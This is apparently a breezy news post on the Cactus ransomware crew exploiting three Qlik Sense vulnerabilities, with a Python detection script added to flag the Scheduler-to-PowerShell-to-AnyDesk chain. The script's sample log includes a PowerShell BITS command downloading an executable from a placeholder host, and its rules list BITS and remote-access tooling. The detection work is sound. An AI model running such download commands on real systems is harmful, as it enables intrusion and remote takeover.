Cyber Intruders Exploit Qlik Sense, Unraveling the Cactus Conundrum

So, turns out, there’s some serious hacking drama unfolding in the cyber world. Those sneaky hackers set their sights on Qlik Sense, the data analytics hotshot. Arctic Wolf, the cybersecurity heroes, spilled the beans in their latest report, revealing that a crew called Cactus went to town on not one, not two, but three vulnerabilities. And get this—they were vulnerabilities that the Qlik Sense team thought they had patched up in late August and September 2023.

Picture this: Qlik discovers two flaws, named CVE-2023-41265 and CVE-2023-41266, in late August. Fast forward a month, and whoopsie-daisy, they find out one of the patches didn’t do its job properly, giving birth to another problem child called CVE-2023-48365. Luckily, Qlik got their act together, patched things up, and sent out the fixes. Crisis averted, right?

Now, let’s dive into the hackers’ playbook. These crafty folks used those three flaws to create secret sessions and fire off unauthorized HTTP requests. But wait, there’s more: they also played the privilege game, elevating their privileges to launch HTTP requests on the backend servers hosting the application.

Cactus, the mischief-makers, used these vulnerabilities as a backstage pass into corporate networks where Qlik Sense was hanging out, all unpatched and vulnerable. They got the Qlik Sense Scheduler service to kick off new processes, and then they pulled out the big guns—PowerShell and the Background Intelligent Transfer Service (BITS)—to download remote access software like AnyDesk.
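Here is a detection-side illustration of the chain just described, written for this post rather than taken from Arctic Wolf, Qlik or Cactus tooling: it walks a handful of constructed process-creation events (Sysmon-style fields, made up for the example) and flags a shell spawned by the Qlik Sense Scheduler service, a BITS transfer launched anywhere under that Scheduler, and AnyDesk appearing as a descendant of it. The Scheduler image name and install path (`Scheduler.exe` under the Qlik Sense folder), the field names, and the `203.0.113.10` download host are assumptions and placeholders, not values from the report.

```python
"""Flag process-creation events that match the Qlik Sense Scheduler abuse
chain: Scheduler -> PowerShell/BITS -> remote access tool (AnyDesk).
Added example with constructed events; not code from the original post."""
import json

# Assumption: the Qlik Sense Scheduler service runs as Scheduler.exe under a
# path containing "Qlik". Adjust to the install tree you actually observe.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bitsadmin.exe"}
REMOTE_ACCESS_TOOLS = {"anydesk.exe"}
BITS_MARKERS = ("start-bitstransfer", "bitsadmin")

# Constructed sample events (Sysmon Event ID 1 style fields), one JSON per line.
# p3 and p4 are the malicious chain; p1 is the service itself, p2 is an admin
# running PowerShell from Explorer and must NOT fire the Scheduler rule.
SAMPLE_LOG = r"""
{"ProcessGuid": "p1", "ParentProcessGuid": "p0", "Image": "C:\\Program Files\\Qlik\\Sense\\Scheduler\\Scheduler.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "\"C:\\Program Files\\Qlik\\Sense\\Scheduler\\Scheduler.exe\""}
{"ProcessGuid": "p2", "ParentProcessGuid": "p9", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe Get-Service"}
{"ProcessGuid": "p3", "ParentProcessGuid": "p1", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Qlik\\Sense\\Scheduler\\Scheduler.exe", "CommandLine": "powershell.exe -NoProfile -Command \"Start-BitsTransfer -Source http://203.0.113.10/setup.exe -Destination C:\\Users\\Public\\setup.exe\""}
{"ProcessGuid": "p4", "ParentProcessGuid": "p3", "Image": "C:\\Users\\Public\\AnyDesk.exe", "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "C:\\Users\\Public\\AnyDesk.exe"}
"""


def image_name(path):
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_qlik_scheduler(path):
    p = path.lower()
    return image_name(p) == "scheduler.exe" and "qlik" in p


def load_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def scan(events):
    """Return {ProcessGuid: [finding, ...]} for every event worth alerting on."""
    by_guid = {e["ProcessGuid"]: e for e in events}

    def under_scheduler(ev, depth=0):
        # Walk up the ParentProcessGuid chain; the depth bound guards against
        # cyclic or corrupted telemetry.
        if depth > 32:
            return False
        if is_qlik_scheduler(ev.get("ParentImage", "")):
            return True
        parent = by_guid.get(ev.get("ParentProcessGuid", ""))
        return parent is not None and under_scheduler(parent, depth + 1)

    findings = {}
    for ev in events:
        hits = []
        name = image_name(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "").lower()
        in_chain = under_scheduler(ev)
        # Rule 1: the Scheduler service directly spawned a shell/BITS client.
        if name in SHELLS and is_qlik_scheduler(ev.get("ParentImage", "")):
            hits.append("qlik-scheduler-spawned-shell")
        # Rule 2: a BITS transfer anywhere beneath the Scheduler.
        if in_chain and any(m in cmd for m in BITS_MARKERS):
            hits.append("bits-transfer-in-scheduler-chain")
        # Rule 3: remote access tooling started beneath the Scheduler.
        if in_chain and name in REMOTE_ACCESS_TOOLS:
            hits.append("remote-access-tool-in-scheduler-chain")
        if hits:
            findings[ev["ProcessGuid"]] = hits
    return findings


def scan_sample():
    return scan(load_events(SAMPLE_LOG))


if __name__ == "__main__":
    for guid, hits in scan_sample().items():
        print(guid, ", ".join(hits))
```

The ancestry walk is what keeps rule 3 from firing on every AnyDesk install in the estate: only a copy whose process tree leads back to the Qlik Sense Scheduler is reported, which is exactly the shape of the intrusion the report describes.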

But that’s not the end of the story. They dabbled in some infostealing antics to grab sensitive corporate data. And the grand finale? The Cactus encryptor, causing chaos and disruption like a digital tornado. To steer clear of this digital storm, Qlik suggests users upgrade to specific versions of Sense Enterprise for Windows, listed out like a DJ’s playlist.